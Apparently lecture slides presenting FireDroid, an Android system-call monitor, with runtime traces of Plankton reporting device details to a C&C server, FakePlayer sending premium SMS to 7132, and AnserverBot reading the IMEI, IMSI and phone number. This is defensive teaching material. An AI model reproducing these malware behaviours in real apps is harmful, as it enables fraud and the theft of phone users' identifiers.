Monitoring Malware at Runtime

Report
Monitoring Malware
at Runtime
From Last Lecture
• Malware authors use advanced coding for avoiding detection
• AnserverBot is a very sophisticate piece of software
• AVS is lagging behind
• Low detection rate on new malware
• Large exposure window before updating DB
• Main issue: rely only on app signature
• What we need is a tool to detect runtime behaviour
FireDroid
• Our group is developing a new Android Security framework
• FireDroid is capable of monitoring app execution and
enforcing security policies
• No need of modifying Android OS code!
• Only modification is to insert a line of text in the init.rc file
• FireDroid enables us to monitor system call execution of apps
(and malware)
System Call Interposition
• System calls are used by apps to interact with the kernel
• By intercepting sensitive system calls we can enforce security
policies to better protect Android
• We can use FireDroid also to provide us information about the
system call executed by apps
Malware Genome Project
• Collection of 2GB of malware samples
• We have executed some of these samples within FireDroid
sandbox
• In the following, we are going to see some more details
• After the semester break, Daniel will provide a live demo
Plankton
• Communication with a C&C server
• Sends some info when the installation is complete
• Together with some setting of the phone
Opening a socket
[1743] syscall=socket(281)
domain:PF INET6
type:SOCK STREAM
protocol:IPPROTO IP
******************************
[1743] syscall=bind(282)
socket: socket:[26088]
sa family = AF INET6
port = 0
address = ::
******************************
[1743] syscall=connect(283)
socket: socket:[26088]
sa family = AF INET6
port = 80
address = 208.93.141.140
******************************
Establishing a connection
[******************************
[1743] syscall=sendto(290)
socket: socket:[26088]
Connected Socket!
data len: 168
data: POST /ProtocolGW/installation HTTP/1.1
Content-Length: 1426
Content-Type: application/x-www-form-urlencoded
Host: www.searchwebmobile.com
Connection: Keep-Alive
******************************
[1743] syscall=sendto(290)
socket:socket:[26088]
Connected Socket!
data len: 1024
data: action=get&applicationId=325842969&developerId=752469853&
deviceId=000000000000000&currentVersion=-1&permissions=android…..
FakePlayer
• The main activity is to send SMS
• It will get the handler for the SMS service from the Service
Manager
• Then sends SMS to premium number (7132) with different
subscription codes
Sending SMS
[*1905]ioctl on /dev/binder with BINDER WRITE READ
cmd:BC TRANSACTION:
target name = android.os.IServiceManager
target = 0x0
code = SVC _MGR _GET _SERVICE
service name = isms
data size = 80
******************************
[*1905]ioctl on /dev/binder with BINDER WRITE READ
cmd:BC TRANSACTION:
target name = com.android.internal.telephony.ISms
target = 0x9
code = 5 (sendText)
data size = 128
Destination: 7132
SMS Body: 849321
AnserverBot
• Retrieves information from the Telephony services
• Telephone number
• International Mobile Station Equipment Identity (IMEI)
• International Mobile Subscriber Identity (IMSI)
• This info is quite sensitive because it specifically points at
YOU!
Getting the
PhoneSubInfo Service
[*2071]ioctl on /dev/binder with BINDER WRITE READ
cmd:BC TRANSACTION:
target name = android.os.IServiceManager
target = 0x0
code = SVC MGR GET SERVICE
service name = iphonesubinfo
******************************
[*2071]ioctl on /dev/binder with BINDER WRITE READ
cmd:BC TRANSACTION:
target name = com.android.internal.telephony.IPhoneSubInfo
target = 0xe
code = 5
data size = 100
data in text format:
code 5: getLineNumber: Retrieves the phone number string for line 1
Getting More Info
******************************
…
code 1: getDeviceId: Retrieves the unique device ID, e.g., IMEI for GSM phones.
******************************
…
code 4: getIccSerialNumber: Retrieves the serial number of the ICC, if applicable.
******************************
…
code 2: getDeviceSvn: Retrieves the software version number for the device, e.g.,
IMEI/SV for GSM phones.
******************************
…
code 3: getSubscriberId: Retrieves the unique subscriber ID, e.g., IMSI for GSM phones.
AnserverBot Fetching from Baidu
******************************
[1639] syscall=connect(283)
socket: socket:[57270]
sa family = AF INET6
port = 80
address = 220.181.111.147
******************************
[1639] syscall=sendto(290)
socket: socket:[57270]
Connected Socket!
data len: 153
data:
GET / HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.0.4; sdk Build/MR1)^M
Host: www.baidu.com
Connection: Keep-Alive
Accept-Encoding: gzip
AnserverBot Fetching from Baidu
[1639] syscall=recvfrom(292)
socket: socket:[57270]
Connected Socket!
data len: 128
data:
HTTP/1.1 200 OK^M
Set-Cookie: BAIDUID=127C8FA29422CAB3BA61707A4969F5DB:FG=1;
max-age=31536000;
expires=Tue, 29-Oct-13 01:17:10 GM
******************************
[1639] syscall=recvfrom(292)
:00:00 GMT; path=/; domain=.baidu.com^M
P3P: CP='' OTI DSP COR IVA OUR IND COM ``^M
Cache-Control: no-cache^M
Content-type: text/html
******************************
Questions?

similar documents